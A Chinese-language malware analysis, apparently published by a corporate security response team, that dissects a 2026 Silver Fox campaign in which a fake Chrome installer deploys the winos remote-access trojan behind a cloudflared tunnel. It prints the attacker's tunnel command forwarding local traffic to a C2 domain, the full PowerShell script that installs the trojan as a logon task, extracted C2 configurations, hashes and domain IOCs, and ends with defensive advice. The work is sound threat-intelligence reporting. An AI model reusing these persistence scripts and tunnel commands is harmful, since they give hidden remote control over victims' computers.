文章总结： 本文披露银狐团伙利用cloudflared隧道与winos木马构建隐形后门的最新技术，通过流量伪装和进程分离规避检测。详细拆解了攻击链各环节并提供了详细IOCs。建议企业加强终端行为管控与软件源头管理，用户仅从官网下载软件以防范此类供应链投毒攻击。 综合评分： 90 文章分类： 威胁情报,恶意软件,逆向分析,应急响应,供应链安全

全网首发！银狐团伙2026年开年最新黑科技深度拆解！

原创

t1anwu t1anwu

顺丰安全应急响应中心

2026年1月27日 18:38 广东

01

背景

这天下午，我收到一位大学朋友小静的紧急求助，她的电脑仿佛中邪般自动在微信上建群，疯狂推送社保补贴诈骗二维码。

我立即联系她电脑断网，由于离得比较近我让她直接把电脑拿过来进行排查。

深度排查后，竟发现银狐团伙用cloudflared+winos打造了隐形后门，这波操作直接颠覆我对该银狐团伙的认知！本次使用的攻击手法此前全网未见公开分析过，属银狐团伙2026年开年全网推行的重要技术迭代更新！

我们由此成为全网首个发现并披露该攻击手法的安全团队，相关技术细节与检测规则已第一时间同步至内部威胁情报平台。

02

核心发现

2.1

发现时间

2026-01-21 15:25:59 UTC

2.2

技术迭代

1、引入合法隧道代理：利用开源工具 cloudflared 建立本地加密隧道，将恶意通信伪装为合法云服务流量。

2、实现恶意行为分离：winos远控木马优先连接本地 localhost:443，主机行为层面无直接外联特征，规避传统进程链检测，配置里面提供了备用C2，当隧道失效才会直接连接备用C2

3、动态进程断链隐藏：cloudflared 仅在安装阶段与木马进程短暂关联，运行时两者无父子或显式通信关系，实现深度隐蔽。

03

深度解析

3.1

技术拆解

该母体文件用的Gentee打包器，文件信息如下表

| | | | — | — | | 文件名 | Chrome-x64.exe | | HASH | eab636bb2dcc35f2eba051007e0bc8522f1ac3ed86c943d2067ef13c5effbe77 | | 样本传播 | 伪造官网下载站 | | 打包方式 | Gentee |

3.1.1

钓鱼执行

母体安装时，通过打包器释放出合法chrome浏览器安装包和恶意安装包cloudflared_installer，文件如下图，随后先安装chrome，然后再安装恶意软件

3.1.2

恶意软件安装

cloudflared_installer.exe为inno setup打包，执行后会释放文件如下

| | | | — | — | | 文件名 | 功能 | | C:\ProgramData\CfServerSoftwareDistribution\WindowsEvent.exe | winos木马 | | C:\ProgramData\Microsoft\System\System.exe | cloudflared | | cf.msi | cloudflared合法安装包 | | create_cfserver_task.ps1 | 创建计划任务执行winos木马 |

3.1.3

服务驻留

cloudflared_installer安装时会创建cloudeflared服务执行System.exe，命令行参数

"C:\ProgramData\Microsoft\System\System.exe" access tcp --hostname www.tamei.cyou --url tcp://127.0.0.1:443

通过这个cloudeflared服务将本地443端口的流量都转发到攻击者控制的服务器www.tamei.cyou

3.1.4

计划任务开机启动

安装过程中执行的create_cfserver_task.ps1如下，注册一个名为”MicrosoftCfServerUpdateTaskMachineCore”的计划任务，在用户登陆时执行winos木马WindowsEvent.exe

Try {Unregister-ScheduledTask -TaskName"MicrosoftCfServerUpdateTaskMachineCore" -Confirm:$false -ErrorActionSilentlyContinue } Catch { } # 获取交互用户，优先使用 Win32_ComputerSystem.UserName，然后退回到explorer.exe 的所有者，最后兜底为当前进程$interactiveUser =(Get-WmiObject -Class Win32_ComputerSystem -ErrorActionSilentlyContinue).UserNameif (-not$interactiveUser) {  $explorer = Get-WmiObject -ClassWin32_Process -Filter "Name='explorer.exe'" -ErrorActionSilentlyContinue | Select-Object -First 1  if ($explorer) {    $owner = $explorer.GetOwner()    if ($owner.ReturnValue -eq 0) {$interactiveUser = "$($owner.Domain)\$($owner.User)" }  }}if (-not$interactiveUser) { $interactiveUser =[System.Security.Principal.WindowsIdentity]::GetCurrent().Name }Write-Output"Registering task for user: $interactiveUser"$action =New-ScheduledTaskAction -Execute"C:\ProgramData\CfServerSoftwareDistribution\WindowsEvent.exe"$trigger =New-ScheduledTaskTrigger -AtLogOn$settings =New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries-DontStopIfGoingOnBatteries -StartWhenAvailable -ExecutionTimeLimit(New-TimeSpan -Seconds 0)$principal =New-ScheduledTaskPrincipal -UserId $interactiveUser -LogonType Interactive-RunLevel HighestRegister-ScheduledTask-TaskName "MicrosoftCfServerUpdateTaskMachineCore" -Action $action-Trigger $trigger -Settings $settings -Principal $principal -ForceStart-ScheduledTask-TaskName "MicrosoftCfServerUpdateTaskMachineCore"

3.1.5

隧道工具

通过服务驻留的system.exe是cloudflared隧道工具，对比HASH后发现来源是github开源软件，是该软件2025.11.1发布的版本，带有合法签名，配合命令行参数实现将本地端口的流量转发到远程服务器上，通信的流量受cloudflared tunnel加密保护

https://github.com/cloudflare/cloudflared/releases/download/2025.11.1/cloudflared-windows-amd64.exe

3.1.6

winos木马上线

WindowsEvent.exe是常规的winos木马，解密数据后在内存中反射加载远控组件，关键在于配置数据与cloudflared的联动，提取出的配置数据如下，提供了3种连接方式，按优先级依次是，127.0.0.1:443、jun88online.com:80、greathomegear.com:8080，其中最优先使用127.0.0.1:443，在本地443端口走clodeflared隧道传输到www.tamei.cyou，winos服务端与该域名通信就可以连接上线，控制终端

|p1:127.0.0.1|o1:443|t1:1|p2:jun88online.com|o2:80|t2:1|p3:greathomegear.com|o3:8080|t3:1|dd:1|cl:1|fz:默认|bb:1.0|bz:2026. 1.17|jp:0|bh:0|fc:0|dl:0|sh:0|kl:0|

3.2

拓线分析

在VT中关联该类型的样本出现的时间，从看到7月份开始就不断有研究人员在测试cloudflared通信效果

相关特征如下

[powershell -NoProfile-ExecutionPolicy Bypass -WindowStyle Hidden -Command "cloudflared accesstcp --hostname rsh.radiogram.shop --url 127.0.0.1:10423"

在测试用cloudflared进行通信

而后9月份再有研究人员测试cloudeflared转发RDP流量

真正意义上与本文银狐变种强相关的，是2025-12-21的样本，不同的是，木马加载是通过白加黑利用

用的是winos的stage进行加载，配置如下

|p1:127.0.0.1|o1:443|t1:1|p2:www.noggrtea.cyou|o2:80|t2:1|p3:www.haipfsapm.cyou|o3:8080|t3:1|dd:1|cl:1|fz:默认|bb:1.0|bz:2025.12.15|jp:0|bh:0|fc:0|dl:0|sh:0|kl:0|

目前我们发现的域名在国内外知名威胁情报平台都是未知的状态，需要注意防护

04

防御指南

4.1

技术侧防御

IOCs：

1、母体hash

目前捕获的母体钓鱼有伪装成chrome浏览器、letsvpn、telegram、aicoin

6d8ece0a340284b7438743338315c270ec536588d6342fb27d03d03cbab721ffd6bfaf75e7b78b09dcc92c250feb53e1848f8c7dd129d30ce030db1a57a440e0cf4e1c72e9dffefdf2b0bdca7ccbfb54dc83a8e26d4c0b2d341ebcace0aea170af26fada29ced171346cb5e9abb984bdfbf064f13116ede91a78588dc0db308d0f75778759f34fa6d3cb7ce1c3f2fec3d5dc11248922ce1d8f3e2e5fd5560874fe18e628d02ea7c3341afe03234dc3e894ba3f65c3013ac2d0726160b4210554f25c7c9a952dda0f65912b1e3cbf1ace1e8eac2369ba1c933314bcc5597d43c32df685b416c40877063f58909341703c5ba1752306563a3a40adf05e37bd8026d31d8184460048e9d94c20d4eeef699fec2cb39761185c53df1d4cb8be1740ec458eb78b68ad931cacd212a2823485dd75d5560fef79382236849f74bcb5c826abcb85749502438073c90a98ac3e294eb6c6011a4bbb1b0e0f37cddc5f8bf6cd4af3ff8fa8d579c12f62b3cae79b039b629d8e0f9fdde7c5fbe8153effcad28342c784262fe70ab32927a37024cb6953f94c74992ded0ea8553384422e0c8d6841f9971497b4f6994d17bf89d656d918b5ba0c017c0e0c98eac60bb55efd609554cd1f7ec76b108a67cd2594305df5cc2b5027877dd07c4bd2a355f27415f8343493a80df5ff4ca3b1e632ffa0a00d2b592cc47e95fa4e7a34acb32f91ce3876ef45b88513acefcf34eadfd177ccb367ecf9f0dc9206df4099fb015739dc6e60770f20ca7cf5d6cb5a0be9e762cb813d268519f2245413f8e633898300a8b393d3a8ce729f528186bee763f74e7487405571dc1c5ba883619b66167a513318d8ace0483d8d3b8f2c674394ee3264c958

2、domain

www.orsisly.cyouwww.tamei.cyoujun88online.comgreathomegear.comwww.noggrtea.cyouwww.haipfsapm.cyouwww.optdnu.comwww.catgit.com

4.2

企业侧防御

1、搭建企业内部自助工具平台：建立内部可信软件源，禁止员工从非官方渠道下载浏览器等常用工具，从源头阻断供应链投毒。

2、强化终端行为管控：启用应用白名单与执行控制，对非授权进程的启动、敏感目录写入及异常网络外联进行实时拦截告警。

4.3

用户侧防御

1、只从官网下载软件：浏览器等工具务必通过官网下载

2、保持软件权限最小化：日常使用标准用户账户，避免使用管理员权限运行浏览器；安装后及时更新，并开启安全软件的实时防护。

3、警惕异常系统行为：如遇电脑卡顿、自动弹窗、社交软件异常发消息，立即断网并联系IT支持，不自行处理。

关注我们，获取行业一手咨询！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：顺丰安全应急响应中心 t1anwu t1anwu《全网首发！银狐团伙2026年开年最新黑科技深度拆解！》